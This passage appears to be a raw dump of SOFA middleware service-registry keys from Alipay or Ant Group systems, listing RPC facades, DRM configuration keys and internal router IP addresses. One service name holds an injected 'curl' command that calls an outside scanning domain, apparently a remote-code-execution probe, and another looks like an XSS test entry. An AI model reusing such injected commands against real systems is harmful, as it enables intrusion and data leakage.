alipay.ordercore.common.service.facade.orderlink.OrderLinkOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.AppBaselineUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.overseapcard.api.OSPCardtransVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:exratecenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.globalprod.common.service.facade.SubCardBindInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xxePayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.punishcenter.common.service.facade.PunishActionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.OperatorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.sip.api.DataAnalysisServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vein.winbillboard.common.service.facade.subtopic.ClusterSubtopic:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.alphad.common.service.facade.dataresource.IDataReSourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.salesmng.common.service.facade.merchant.api.MerchantServerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.task.remote.handler.RemoteTaskHandler:1.0:MOBILEACAUTH_CACHE_CONSIST_CHECK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.common.service.facade.ArRateAndChargeRateCompareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcserviceop.marketing.activity.service.facade.ActivityBlockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.devicmtn.service.facade.DevicemtnTaskListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.cicada.facade.api.BrandWallCreateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openctrl.facade.FcAppManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.growthplus.hook.HookDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.echox.drm.EchoxDataGatherDrm.echoxGatherConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinpromo.common.service.facade.equity.CampExposeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.agreement.api.UserAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.done.core.opensearch.async.AsyncIndexService:1.0:asyncTaskExecIndexer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.ModelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.framodel.core.service.facade.api.FramodelD2Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nfcc.common.service.facade.callback.TrafficControlCallbackFacade:1.0:zpaascore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frservcenter.facade.api.RiskInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.trfcEmergencyCode.EmergencyCodeBackStageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1224_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gfinsight.service.api.forecast.ForcastOperatorLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insdataprod:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsDwVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.paymentmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.183.172#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.autoinsprod.common.service.facade.AutoInsCompanyAccountFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.spi.mobilegw.FundOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","io.sofastack.cafe.workflowx.sofarpc.facade.WorkflowxRPCInvocationFacade:1.0:SERVERLESS_PLAN_WF_K8S@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoguard.common.service.facade.inspection.api.PcRuleInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.WorkOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.settling.common.service.facade.SettlingMdmQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.nearQueryAcivityListLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_172.21.106.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.aciamcore:name=cn.com.antcloud.common.auth.client.config.AntPersonalDrmConfigTrigger.errorMessageEN,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.productOffset,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.123.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.common.service.client.drm.CDSClientDrm.clientLocalCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bketensip_busiop_callbackxss3927test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_SIHAIFIRST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finmodelops.common.service.facade.api.FinModelOpsCubeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:tscenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bstsolprod.biz.service.cooperation.facade.MerchantSettleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegeocoding.common.service.facade.bizarea.MarKetingBizAreaFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-promobench-service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.1.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.abilitycore.common.service.facade.solution.SolutionCategoryConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_ANTSCHEDULER_SERVERLESS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.88.136.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.emc.common.service.facade.api.EmergencyLogFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_ACCTRANS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.client.SystemAppInvokeService:1.0:abnclprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gfintertrade.common.service.facade.api.InterTradeApprovalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:intopermanager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.129.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileic.common.service.integration.top.TopMessageHandler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DASICUBE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.l2cache.L2CacheClientSwitch.degradeStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.management.tag.TagMngConfigFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.50.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appstore.common.service.facade.commodity.BumngUtilsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.TaskOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scsupport.common.service.facade.push.StockPushVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:demo-test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchishub.common.service.facade.api.AlgorithmTmplConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebdistributor.common.facade.service.BizInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.livetradeprod.service.facade.api.ShakeBizContextOpFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.groot:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.tabProductInfoClear,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iintegration.common.service.facade.api.AppManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.MbaprodConfigResource.vccRegularIdTradeNo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.guarcore.common.service.facade.guarantee.api.GrtCompQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.ArddRuleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.settleprod.service.facade.agency.PartnerAddressFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.titan.dcc.common.service.facade.ToRzoneMessageSync:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ioteds.metadata.app.api.AppMetadataInnerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.article.UrlContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pccontractprod.common.service.facade.admin.api.RuleDecisionAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.facade.FileTaskAdminService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.ShopDishQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.facade.api.AnnaCommonSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.AppManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:koa-session@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fixasds.api.SimulationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.overseas.service.facade.spi.TradeTestFacade:1.0:gmcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.182.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dss.endpoint.plugin.openapi.TaskOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insmobile:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@pvsofaclient#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.lifemng.facade.ebpp.SyncProdSwitchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvTitleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcardcore.common.service.facade.mpcard.McardInvalidFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@pcreditkit#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.riskmng:name=com.alipay.riskmng.biz.drm.ScanRelieveResource.scanIdentifyFreezeRelieveSwitchStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:zmcateye@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.191.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_FEE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-frastress-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbservindustryprod.common.service.facade.manage.KbservOperationPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommons.common.spi.api.ArtisanComponentSpiFacade:1.0:WPYXComponentSpiFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.ops.client.ifxtrade.OpsIfxtradeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.142.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.106.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fininfo:name=com.alipay.finsupport.component.cache.ctrldata.drm.CacheSwitchDRM.manualCacheCompareDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbomp.common.service.facade.spi.AlscUmpNotifyMessageCallback:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:consumeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.OssFileTemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.bizprodmng.biz.shared.drm.impl.KbsearchDrmConfigImpl.strShopInfoSource,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-fintechrobottwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundWebsiteCustomerCommonFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.233.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ordermng.common.service.api.orderlink.OrderLinkService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_C_CALENDAR_REMIND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.baitiaoprod:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.drc.rm.endpoint.facade.WhiteListRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cicada.bizlogicide.common.service.facade.api.ProductAbilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.OssFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.meshyserver.common.service.facade.spi.BizSheetFacade:1.0:mrchMemberCardSheetFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.tinyapp.TinyAppSpatialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.voucherAlipassTemplateParamKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.20.142.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:sesameCredit_zmcustcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.config.ConfigSimpleService:1.0:benefitConfigSimpleService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.97.181#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileiclib.common.service.facade.admin.service.SceneParaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.182.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.minicore.common.service.facade.rel.api.AppRelationOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cfpcenter.emc.common.service.facade.api.EmergencyTransFacade:1.0:INNERTHIRD@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:gzmshmp-mockweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accreditcore.common.service.facade.StopInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gpfnfiveaccount.facade.api.TransferDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iriskmerchant.core.service.infosec.InfoSecService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nfccdbsync.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.product.AutoMktProductTemplateFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.component.ComponentConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.core.service.repository.inst.FaInstContractRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.growth.AcquisitionUndertakeInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.common.service.antmanager.facade.AntManagerFamilyGroupFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.common.service.facade.record.RecordReplayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.conf.client.XViewObjectConfClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:antbuservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.views,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcinstprod.common.service.facade.api.instpromo.InstPromoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.showTotalSuccAmtCnt,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acticketcore.kernel.common.service.facade.CommonFacade:1.0:kCommonFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_ZHENGYUAN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.180.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.smcp.facade.center.AppletFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.156.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","mbillexprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilerelation.common.service.facade.back.TlouBizTagConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantVerificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.tvm.VulMetaDataManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:developerops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.spi.bc.BcBusinessInfoFacade:1.0:finadvisorprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdiscountprod.common.service.facade.voucher.api.VoucherVerifyRecordManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.share.partner.TransferInstructionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchaincustomer.facade.api.fininfoconfig.FininfoConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.rights.UserRightsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.crowdbase.groupgrowth.GroupGrowthCrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.api.WeixinQrVerifyCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_mobile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:curl http://GIYHU5BSMQWTC5LVPJRW2LLVNZUXC5LFJFSC2ZBZOM3WY6LBM4------.rce.scan.noble.dn5l0g.co@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.drm7314#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.null:name=com.antcloud.ifcidentitycloud.common.service.integration.mic.smsProductConf.useAllSmsCodeKeepSameModelConfStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.prodquery.common.service.api.arrangement.ArrangementPageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.CertServiceUnifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_MOBILECASHIER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundprod.common.service.facade.product.query.FpGoldQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.29.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.koubei.kbordersync.common.service.facade.spi.OrderEventNotifyProcessCallback:1.0:kbcateringorderprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_access_interfaceCodeSampleGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergwlite.service.facade.spi.MessageReceiveService:1.0:instasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizops.facade.StampMonitoringQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","acts.sofa.test.facade.TestOneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.PermissionActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipayment.service.facade.api.async.AsyncAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditmarket.service.PcreditFreeCardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.AutoInsLeadsFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.volvo.biz.aiya.topo.TaskTopoExecService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.service.failover.FailoverSwitchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.solution.MerchantOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.buservice:name=com.alipay.zdal.ldc.tair.DynamicConfigTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_PRODUCT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.displayAllowPreAuth,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileapp.common.service.facade.client.ClientInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.finnet.service.drm.ChannelFilterDRM.tntInstIdSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clivemng.common.service.facade.api.clvuserext.ClvUserExtService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.anteye.huoban.HuobanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:simulabcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchishub.common.service.facade.task.mrch.MrchTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amlcloud.common.service.facade.api.ScriptVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:grayEngineChangeServiceCheckCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.fmcgcore.common.service.facade.api.order.OrderQueryRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.a